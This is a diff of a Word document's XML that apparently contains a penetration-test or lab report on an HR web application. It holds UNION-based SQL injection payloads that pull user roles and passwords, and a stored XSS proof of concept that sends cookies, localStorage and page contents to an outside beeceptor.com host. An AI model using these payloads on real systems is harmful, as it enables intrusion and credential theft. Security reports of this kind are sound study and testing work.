+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Users' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(column_name,1,2)=BINARY 'id' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>column_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12007,7 +13596,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>"api", "id", "password", "probation", "</w:t>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>", "id", "password", "probation", "</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12117,7 +13720,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12153,7 +13776,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> having substr(</w:t>
+              <w:t xml:space="preserve"> having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12233,7 +13876,47 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, roles from Users having substr(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, roles from Users having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12287,7 +13970,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>"user", "HR admin"</w:t>
+              <w:t>"user", "</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>HR admin</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12320,7 +14017,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>ext, we want to find out who are “HR admin”.</w:t>
+              <w:t>ext, we want to find out who are “HR admin”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> users</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12366,7 +14075,38 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,roles,username from Users having</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,roles</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,username</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from Users having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12377,14 +14117,25 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr(username,1,</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(username,1,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12404,6 +14155,7 @@
               </w:rPr>
               <w:t>)=BINARY '</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12413,6 +14165,7 @@
               </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12491,7 +14244,78 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select NULL,username,password from Users having substr(password,1,32)=BINARY 'FLAG{Wear_some_glasses_minions!}' and </w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,username</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,password</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from Users having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(password,1,32)=BINARY 'FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Wear_some_glasses_minions</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">!}' and </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12501,7 +14325,27 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>username=BINARY 'prodigysml' limit 1 --+</w:t>
+              <w:t>username=BINARY '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>prodigysml</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12529,12 +14373,14 @@
               </w:rPr>
               <w:t>eaks out the password of “</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
@@ -12551,7 +14397,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>FLAG{Wear_some_glasses_minions!}</w:t>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Wear_some_glasses_minions</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12672,13 +14532,13 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> detailed and</w:t>
+        <w:t xml:space="preserve"> detailed </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> automated in </w:t>
+        <w:t xml:space="preserve">in </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12712,18 +14572,27 @@
         </w:rPr>
         <w:t>`</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>py sqli.py</w:t>
-      </w:r>
+        <w:t>py</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
+        <w:t xml:space="preserve"> sqli.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
         <w:t>`</w:t>
       </w:r>
       <w:r>
@@ -12773,7 +14642,7 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>the file</w:t>
+        <w:t>it</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12852,7 +14721,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:bookmarkStart w:id="50" w:name="_Section2_–_stored"/>
-      <w:bookmarkStart w:id="51" w:name="_Toc71399662"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc71451234"/>
       <w:bookmarkEnd w:id="50"/>
       <w:r>
         <w:rPr>
@@ -12879,7 +14748,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="52" w:name="_Exploitation_1"/>
-      <w:bookmarkStart w:id="53" w:name="_Toc71399663"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc71451235"/>
       <w:bookmarkEnd w:id="52"/>
       <w:r>
         <w:rPr>
@@ -12906,24 +14775,37 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> following steps provide a proof of concept on how the stored cross-site scripting vulnerability is exploited to make an unauthorised user passing the probation on behalf of the HR team member.</w:t>
+        <w:t xml:space="preserve"> following steps provide a proof of concept on how the stored cross-site scripting vulnerability is exploited to make an unauthorised user pass the probation on behalf of the HR team member</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="688"/>
-        <w:gridCol w:w="5500"/>
-        <w:gridCol w:w="2831"/>
+        <w:gridCol w:w="846"/>
+        <w:gridCol w:w="5386"/>
+        <w:gridCol w:w="2787"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="573" w:type="dxa"/>
+            <w:tcW w:w="846" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -12955,7 +14837,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4809" w:type="dxa"/>
+            <w:tcW w:w="5386" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -12981,7 +14863,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3637" w:type="dxa"/>
+            <w:tcW w:w="2787" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13015,7 +14897,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="573" w:type="dxa"/>
+            <w:tcW w:w="846" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13035,7 +14917,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4809" w:type="dxa"/>
+            <w:tcW w:w="5386" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13072,140 +14954,412 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var serializer = new XMLSerializer();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhttp.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhttp.send(</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "dom=" + serializer.serializeToString(document) +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;cookie=" + document.cookie +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;localStorage=" + JSON.stringify(localStorage));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhttp.send();</w:t>
+              <w:t xml:space="preserve">  var serializer = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLSerializer</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
